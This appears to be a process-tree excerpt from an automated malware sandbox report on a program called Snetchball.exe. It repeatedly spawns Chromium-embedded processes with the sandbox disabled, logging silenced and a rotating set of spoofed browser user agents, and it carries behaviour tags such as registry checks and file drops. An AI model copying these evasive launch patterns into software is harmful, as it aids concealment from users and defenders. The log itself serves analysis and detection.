C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2784 --field-trial-handle=2788,i,210827359154614944,17208522435841593598,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:239⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2928 --field-trial-handle=2788,i,210827359154614944,17208522435841593598,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:839⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3016 --field-trial-handle=2788,i,210827359154614944,17208522435841593598,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:839⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=2788,i,210827359154614944,17208522435841593598,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:139⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=2788,i,210827359154614944,17208522435841593598,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:139⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/126.0.6478.153 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4140 --field-trial-handle=2788,i,210827359154614944,17208522435841593598,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:139⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"41⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2804 --field-trial-handle=2808,i,15454742709647543125,13101203703203642475,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:242⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3056 --field-trial-handle=2808,i,15454742709647543125,13101203703203642475,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:842⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3080 --field-trial-handle=2808,i,15454742709647543125,13101203703203642475,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:842⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=2808,i,15454742709647543125,13101203703203642475,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:142⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=2808,i,15454742709647543125,13101203703203642475,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:142⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"43⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2772 --field-trial-handle=2776,i,14363554365350237927,4687397199639950954,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:245⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3032 --field-trial-handle=2776,i,14363554365350237927,4687397199639950954,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:845⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3036 --field-trial-handle=2776,i,14363554365350237927,4687397199639950954,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:845⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3116 --field-trial-handle=2776,i,14363554365350237927,4687397199639950954,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:145⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"47⤵
- Drops file in Windows directory
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2764 --field-trial-handle=2768,i,268561796635738986,15933459970118420474,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:248⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3064 --field-trial-handle=2768,i,268561796635738986,15933459970118420474,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:848⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3080 --field-trial-handle=2768,i,268561796635738986,15933459970118420474,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:848⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=2768,i,268561796635738986,15933459970118420474,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:148⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"49⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"50⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2772 --field-trial-handle=2776,i,11826410112999658371,10067520919232495530,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:251⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3064 --field-trial-handle=2776,i,11826410112999658371,10067520919232495530,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:851⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3068 --field-trial-handle=2776,i,11826410112999658371,10067520919232495530,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:851⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 OPX/2.5.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=2776,i,11826410112999658371,10067520919232495530,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:151⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"52⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"53⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2780 --field-trial-handle=2784,i,18214678490662489403,16547540043955827226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:254⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3080 --field-trial-handle=2784,i,18214678490662489403,16547540043955827226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:854⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3100 --field-trial-handle=2784,i,18214678490662489403,16547540043955827226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:854⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3116 --field-trial-handle=2784,i,18214678490662489403,16547540043955827226,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:154⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"55⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"56⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2800 --field-trial-handle=2092,i,10523724659979098097,11572190020435525926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:257⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3084 --field-trial-handle=2092,i,10523724659979098097,11572190020435525926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:857⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3088 --field-trial-handle=2092,i,10523724659979098097,11572190020435525926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:857⤵
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/128.0 Mobile/15E148 Safari/605.1.15" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3104 --field-trial-handle=2092,i,10523724659979098097,11572190020435525926,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:157⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"58⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"59⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2780 --field-trial-handle=2784,i,7886968051460229149,10373124248802330214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:260⤵
-
-
